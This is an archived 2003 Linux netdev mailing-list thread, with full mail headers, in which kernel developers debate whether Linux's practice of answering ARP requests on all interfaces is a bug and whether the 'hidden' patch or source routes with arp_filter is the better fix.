Content-Transfer-Encoding: 7bit X-archive-position: 4319 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 01:58:25 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 16:46 David S. Miller wrote: > >Bas's problem can be solved by him giving a "preferred source" > >to each of his IPV4 routes and setting the "arpfilter" sysctl > >variable for his devices to "1". > > Yes, it's another approach to solve his problem. But he must play with routing. Precisely he must, because he has misconfigured routes for the behavior he desires. 
His problem is about source address selection when trying to contact a given destination. If there is no specific source address specified, the kernel may legally use any source address, and this decision extends to ARP handling as well. It's totally illogical to say that it's easier for him to patch his kernel and reboot it than fix his route configuration. From mcr@sandelman.ottawa.on.ca Sun Jul 27 17:10:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:10:14 -0700 (PDT) Received: from noxmail.sandelman.ottawa.on.ca (cyphermail.sandelman.ottawa.on.ca [192.139.46.78]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0A8Fl004195 for ; Sun, 27 Jul 2003 17:10:09 -0700 Received: from sandelman.ottawa.on.ca (desk.marajade.sandelman.ca [205.150.200.247]) by noxmail.sandelman.ottawa.on.ca (8.11.6p2/8.11.6) with ESMTP id h6S087W18340 (using TLSv1/SSLv3 with cipher EDH-RSA-DES-CBC3-SHA (168 bits) verified OK); Sun, 27 Jul 2003 20:08:17 -0400 (EDT) Received: from marajade.sandelman.ottawa.on.ca (mcr@localhost) by sandelman.ottawa.on.ca (8.12.3/8.12.3/Debian -4) with ESMTP id h6S09O96015379; Sun, 27 Jul 2003 20:09:24 -0400 To: "David S. Miller" cc: Bas Bloemsaat , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-reply-to: Your message of "Sun, 27 Jul 2003 15:12:34 PDT." 
<20030727151234.6e2aa57e.davem@redhat.com> Mime-Version: 1.0 (generated by tm-edit 1.8) Content-Type: text/plain; charset=US-ASCII Date: Sun, 27 Jul 2003 20:09:24 -0400 Message-ID: <15378.1059350964@marajade.sandelman.ottawa.on.ca> From: Michael Richardson X-archive-position: 4320 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mcr@sandelman.ottawa.on.ca Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- >>>>> "David" == David S Miller writes: David> Bas Bloemsaat wrote: >> I think this is unwanted behaviour. David> Not a bug. This behavior is on purpose. Yes, this was said 5 years ago when it was reported to netdev the first dozen times. I didn't buy the reasoning then, and I still do not now. I think that it is gratuitously incompatible behaviour which bites way more people in the ass than the number of people who it actually benefits. David> Use source based routes if you want to control how ARP David> responses behave in this way. David> This is becomming a FAQ. I eargerly await the FAQ. ] Out and about in Ottawa. hmmm... beer. 
| firewalls [ ] Michael Richardson, Sandelman Software Works, Ottawa, ON |net architect[ ] mcr@sandelman.ottawa.on.ca http://www.sandelman.ottawa.on.ca/ |device driver[ ] panic("Just another NetBSD/notebook using, kernel hacking, security guy"); [ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Finger me for keys - custom hacks make this fully PGP2 compat iQCVAwUBPyRppYqHRg3pndX9AQGS8gP/c6X+73r48o8q5Gasg0I1rJ/lzQRHqJgL ClfjWSQalv3Xfiz/wZeLXKZ0noNsde7E+Kv9uK1YpHtjn2AiNEu4umMXbRJ5zlV4 IrwK5SbmQBK3ROdfK27dWc0JOwQejkJtpEE6cz28muSWgFrt61YcfcJ4PrSKYaj4 U7VzZtf5cTk= =yTDD -----END PGP SIGNATURE----- From carlosev@newipnet.com Sun Jul 27 17:12:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:12:18 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0CBFl004637 for ; Sun, 27 Jul 2003 17:12:12 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 42E5120642; Mon, 28 Jul 2003 02:12:09 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 746BC2092D; Mon, 28 Jul 2003 02:11:57 +0200 (CEST) Message-ID: <200307280211590888.10957DD9@192.168.128.16> In-Reply-To: <20030727165831.05904792.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:11:59 +0200 From: "Carlos Velasco" To: "David S. 
Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6S0CBFl004637 X-archive-position: 4321 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 16:58 David S. Miller wrote: >> On 27/07/2003 at 16:46 David S. Miller wrote: >> >Bas's problem can be solved by him giving a "preferred source" >> >to each of his IPV4 routes and setting the "arpfilter" sysctl >> >variable for his devices to "1". >> >> Yes, it's another approach to solve his problem. But he must play with >routing. > >Precisely he must, because he has misconfigured routes for the >behavior he desires. > >His problem is about source address selection when trying to >contact a given destination. Bas said: == >but it turned out that this wasn't the case. On closer examination it >turned out that any ARP request to a local IP resulted in a response, >even if the devices were on different subnets or ethernet segments. == It's the "hidden" switch.... again. I suppose that Bas can confirm it. >It's totally illogical to say that it's easier for him to patch his >kernel and reboot it than fix his route configuration. Sure... it WOULD be the easiest thing if it would be into the kernel main stream. But it isn't, making linux behave different to other OS and systems without any way or feature to make it behave like the others. 
Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:17:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:17:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0HFFl005252 for ; Sun, 27 Jul 2003 17:17:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26445; Sun, 27 Jul 2003 17:14:03 -0700 Date: Sun, 27 Jul 2003 17:14:03 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727171403.6e5bcc58.davem@redhat.com> In-Reply-To: <200307280211590888.10957DD9@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4322 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev [ Please wrap your lines at 72 characters, you emails are really difficult to read and reply to, thanks. ] On Mon, 28 Jul 2003 02:11:59 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 16:58 David S. Miller wrote: > >His problem is about source address selection when trying to > >contact a given destination. > > Bas said: > == > >but it turned out that this wasn't the case. 
On closer examination it > >turned out that any ARP request to a local IP resulted in a response, > >even if the devices were on different subnets or ethernet segments. > == > > It's the "hidden" switch.... again. > I suppose that Bas can confirm it. This only means your problem can also be fixed by correcting your routing tables. > >It's totally illogical to say that it's easier for him to patch his > >kernel and reboot it than fix his route configuration. > > Sure... it WOULD be the easiest thing if it would be into the kernel > >main stream. But it isn't, making linux behave different to other > >OS and systems without any way or feature to make it behave like > >the others. Show me the standard that Linux violates by behaving in this way? There are none, our behavior is perfectly acceptable. Other systems do not give you the capabilities our routing layer does, such as route based source address selections. So it is no surprise that they behave differently in this area. From carlosev@newipnet.com Sun Jul 27 17:35:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:35:41 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0ZWFl006637 for ; Sun, 27 Jul 2003 17:35:33 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 78BEF20941; Mon, 28 Jul 2003 02:35:30 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id BC19620642; Mon, 28 Jul 2003 02:35:18 +0200 (CEST) Message-ID: <200307280235210263.10AADFF8@192.168.128.16> In-Reply-To: <20030727171403.6e5bcc58.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> X-Mailer: Calypso Version 
3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:35:21 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4323 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:14 David S. Miller wrote: >[ Please wrap your lines at 72 characters, you emails are really > difficult to read and reply to, thanks. ] Done. >This only means your problem can also be fixed by correcting >your routing tables. By playing with the routing table and using arp_filter. Or by using the hidden patch. Or by using an ARP filtering tool such as iparp or netfilter/arpfilter. IMHO "hidden" is the simplest (provided it's compiled into the kernel). >Show me the standard that Linux violates by behaving in this way? >There are none, our behavior is perfectly acceptable. Sure it is... I have never said it's wrong; I only say that its behaviour is different from other OSes and it's NOT usual. And in certain scenarios it could be a desired behaviour. >Other systems do not give you the capabilities our routing layer does, >such as route based source address selections. So it is no surprise >that they behave differently in this area. The problem is that Linux is unable to behave like other OSes and systems do in a simple way. The easy way is the "hidden" patch, if it's applied in the kernel.
Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:39:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:39:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0dKFl007175 for ; Sun, 27 Jul 2003 17:39:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26532; Sun, 27 Jul 2003 17:36:01 -0700 Date: Sun, 27 Jul 2003 17:36:00 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727173600.475d95fb.davem@redhat.com> In-Reply-To: <200307280235210263.10AADFF8@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4324 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 02:35:21 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 17:14 David S. Miller wrote: > >Other systems do not give you the capabilities our routing layer does, > >such as route based source address selections. So it is no surprise > >that they behave differently in this area. > > Problem is that linux is unable to behave like the other OS and systems > do in a simple way. 
> The easy way is the "hidden" patch, if it's applied in the kernel. Not true, anyone is free to design a graphical GUI or shell script (or even a wrapper for the /sbin/ip tool) that gives you the default behavior you want, without any user interaction whatsoever. From carlosev@newipnet.com Sun Jul 27 17:53:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:53:26 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0rKFl008172 for ; Sun, 27 Jul 2003 17:53:21 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 3AD2520642; Mon, 28 Jul 2003 02:53:18 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 7376A20941; Mon, 28 Jul 2003 02:53:07 +0200 (CEST) Message-ID: <200307280253090799.10BB2DF0@192.168.128.16> In-Reply-To: <20030727173600.475d95fb.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:53:09 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4325 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:36 David S. 
Miller wrote: >> The easy way is the "hidden" patch, if it's applied in the kernel. > >Not true, anyone is free to design a graphical GUI or shell script (or >even a wrapper for the /sbin/ip tool) that gives you the default >behavior you want, without any user interaction whatsoever. Anyone is free to do many things. But if the hidden patch and /proc switch were in the main kernel, it would be the simplest way to solve all these "problems" (with an echo "1" and without filtering or using iproute2). Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:59:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:59:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0x7Fl008743 for ; Sun, 27 Jul 2003 17:59:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26607; Sun, 27 Jul 2003 17:55:57 -0700 Date: Sun, 27 Jul 2003 17:55:57 -0700 From: "David S.
Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727175557.1d624b36.davem@redhat.com> In-Reply-To: <200307280253090799.10BB2DF0@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4326 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 02:53:09 +0200 "Carlos Velasco" wrote: > But if the hidden patch and /proc switch would be in the main kernel, > it would be the simpliest way to solve all these "problems" (with an > echo "1" and without filtering or using iproute2). With or without your suggestion, people have to do something different. This doesn't even address all the problems there are with the hidden patch. It does things that belong on the netfilter level and not on the ARP/routing level. Again, I'd like you to read all the discussions that have happened on this topic in the past, in particular those made by Alexey Kuznetsov on this topic. He gives very clear and concise reasons why the "hidden" patch is logically doing things in the wrong part of the kernel, and therefore won't ever be put into the tree. 
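The alternative to "hidden" that was suggested earlier in this thread (a preferred source on each IPv4 route, plus the ARP filter sysctl set to 1 per device) could be wrapped in a small script along the following lines. This is only a sketch under stated assumptions: the function name `arp_filter_commands`, the device names, prefixes and addresses are hypothetical, and the script only builds command strings; it does not run them or check that they suit a given setup.

```python
def arp_filter_commands(links):
    """Build the shell commands for a 'preferred source + arp_filter' setup.

    links is a list of (dev, prefix, src) tuples (hypothetical values):
      dev    - interface name, e.g. "eth0"
      prefix - directly connected network, e.g. "192.168.1.0/24"
      src    - preferred source address for that route
    Returns the commands as strings; nothing is executed here.
    """
    cmds = []
    for dev, prefix, src in links:
        # Give the connected route an explicit preferred source address.
        cmds.append(f"ip route replace {prefix} dev {dev} src {src}")
        # Enable ARP filtering on this device via /proc.
        cmds.append(f"echo 1 > /proc/sys/net/ipv4/conf/{dev}/arp_filter")
    return cmds


if __name__ == "__main__":
    example = [
        ("eth0", "192.168.1.0/24", "192.168.1.10"),
        ("eth1", "192.168.2.0/24", "192.168.2.10"),
    ]
    for line in arp_filter_commands(example):
        print(line)
```

Whether this covers a setup where one interface gets its address from DHCP depends on re-running such a script whenever the lease changes, which the sketch does not attempt.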
From carlosev@newipnet.com Sun Jul 27 18:23:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 18:23:26 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S1NEFl010367 for ; Sun, 27 Jul 2003 18:23:16 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 331CB20642; Mon, 28 Jul 2003 03:23:12 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 450B520941; Mon, 28 Jul 2003 03:23:00 +0200 (CEST) Message-ID: <200307280323020667.10D68954@192.168.128.16> In-Reply-To: <20030727175557.1d624b36.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 03:23:02 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4327 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:55 David S. Miller wrote: >With or without your suggestion, people have to do something >different. Just enabling the hidden switch solved my setting and I think it solves most of "problem" settings. 
>This doesn't even address all the problems there are with >the hidden patch. It does things that belong on the netfilter >level and not on the ARP/routing level. Well... it's just your opinion... other OSes and systems don't use netfilter or firewalling at all (e.g. Windows) and behave as Linux does with "hidden" applied. Really, the only one I have tested that does not do it is Linux 2.2+. For me (not a kernel developer), my world is the OSI layers, and the isolation of the interfaces at layer 2 IMHO should be in the kernel, not in a firewall module that you must install, tune and configure. >Again, I'd like you to read all the discussions that have happened on >this topic in the past, in particular those made by Alexey Kuznetsov >on this topic. He gives very clear and concise reasons why the >"hidden" patch is logically doing things in the wrong part of the >kernel, and therefore won't ever be put into the tree. I will look... but doing ARP filtering is not a really simple solution in any way. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 18:39:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 18:39:05 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S1cxFl011660 for ; Sun, 27 Jul 2003 18:38:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id SAA26717; Sun, 27 Jul 2003 18:35:48 -0700 Date: Sun, 27 Jul 2003 18:35:47 -0700 From: "David S.
Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727183547.784b6ab5.davem@redhat.com> In-Reply-To: <200307280323020667.10D68954@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4328 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 03:23:02 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 17:55 David S. Miller wrote: > >With or without your suggestion, people have to do something > >different. > > Just enabling the hidden switch solved my setting and I think it solves > most of "problem" settings. So do my suggestions. I don't deny that it fixes your problem, that is not what we're talking about. We're talking about how one should fix the problem, and I'm trying to show you why "hidden" patch is not the answer to that. > >This doesn't even address all the problems there are with > >the hidden patch. It does things that belong on the netfilter > >level and not on the ARP/routing level. > > Well... it's just your opinion... 
other OS and systems don't use > netfilter of firewalling at all (ex. Win) and behave like with "hidden" > applied. Ummm, with "hidden" you still have to make a configuration change. Second of all, "hidden" makes the kernel behave in a non-RFC compliant way. This is the categorization that I use to determine if something belongs on the netfilter level or not. If something changes the way in which the Linux networking behaves wrt. RFCs, this "operation" belongs at the netfilter level. This is true for the "hidden" patch. It causes the system to ignore ARP requests it should respond to. On the other hand, the "arpfilter" sysctl setting makes the kernel still behave in an RFC compliant manner, it only responds to ARPs on interfaces it would use to speak to the requestor. > Really, the only one I have tested that not do it is Linux 2.2+ Yes, we removed "hidden" from 2.2.x in lieu of "arpfilter" sysctl and the netfilter ARP filtering module. > For me (not a kernel developer), my world are the OSI layers, OSI layers have nothing to do with the problem we are discussing. BTW, OSI layers are how networking stacks are described in textbooks and standards and far away from how one should implement said stack. Van Jacobson even said this once :-) > I will look... but doing arp filter is not a real simple solution in > any way. It would be really nice if people might consider that it could even be possible to make things like the IPVS layer install the appropriate NETFILTER_ARP chain rules when the IPVS configuration installed dictates that one is needed. People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were to do that. And all of that would be _FINE_ because like ARP netfilter, IPVS lies inside of netfilter where such things which change networking behavior semantics radically belong. 
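The difference between the default ARP behaviour and the "arpfilter" setting described above can be illustrated with a small model. This is a simplified Python sketch, not kernel code: the interface names, the addresses and the helpers `lookup_dev` and `should_reply` are all hypothetical, and the route lookup is a plain longest-prefix match that ignores policy routing and preferred sources.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Route:
    prefix: ipaddress.IPv4Network
    dev: str


def lookup_dev(routes, dst):
    """Return the device of the longest-prefix route matching dst, or None."""
    addr = ipaddress.ip_address(dst)
    matches = [r for r in routes if addr in r.prefix]
    if not matches:
        return None
    return max(matches, key=lambda r: r.prefix.prefixlen).dev


def should_reply(local_addrs, routes, in_dev, sender_ip, target_ip, arp_filter):
    """Decide whether an ARP request seen on in_dev gets an answer.

    local_addrs maps device name -> list of addresses configured on it.
    Default (arp_filter False): answer for any local address, whichever
    device the request arrived on.
    Filtered (arp_filter True): answer only if the route back to the
    requestor leaves through the device the request arrived on.
    """
    all_local = {a for addrs in local_addrs.values() for a in addrs}
    if target_ip not in all_local:
        return False
    if not arp_filter:
        return True
    return lookup_dev(routes, sender_ip) == in_dev


if __name__ == "__main__":
    # Two interfaces plugged into the same ethernet segment (hypothetical).
    addrs = {"eth0": ["10.0.0.1"], "eth1": ["10.0.1.1"]}
    routes = [
        Route(ipaddress.ip_network("10.0.0.0/24"), "eth0"),
        Route(ipaddress.ip_network("10.0.1.0/24"), "eth1"),
    ]
    for dev in ("eth0", "eth1"):
        for flt in (False, True):
            answer = should_reply(addrs, routes, dev, "10.0.0.50", "10.0.0.1", flt)
            print(dev, "arp_filter" if flt else "default", answer)
```

In the case of two interfaces on one segment, the default answers on both devices, while the filtered variant answers only on the device the routing table would use to reach the requestor. The host still answers the request, just not on every interface.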
From greearb@candelatech.com Sun Jul 27 19:31:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 19:31:16 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S2V9Fl015083 for ; Sun, 27 Jul 2003 19:31:09 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6S2V1m2024167; Sun, 27 Jul 2003 19:31:02 -0700 Message-ID: <3F248AE5.4000204@candelatech.com> Date: Sun, 27 Jul 2003 19:31:01 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: Bas Bloemsaat , netdev@oss.sgi.com, layes@loran.com, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices References: <20030727151234.6e2aa57e.davem@redhat.com> In-Reply-To: <20030727151234.6e2aa57e.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4329 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Sun, 27 Jul 2003 22:52:48 +0200 (CEST) > Bas Bloemsaat wrote: > > >>I think this is unwanted behaviour. > > > Not a bug. This behavior is on purpose. What is the benefit of having it work as it does currently in the standard kernel? I too was surprised to find it works this way, but have since converted to use source-routes. Interestingly, I can only use 252 or so source routes because the RFC for netlink only gives us an 8-bit identifier for the route id, so this still breaks if you want to run lots of VLANs or something like that.
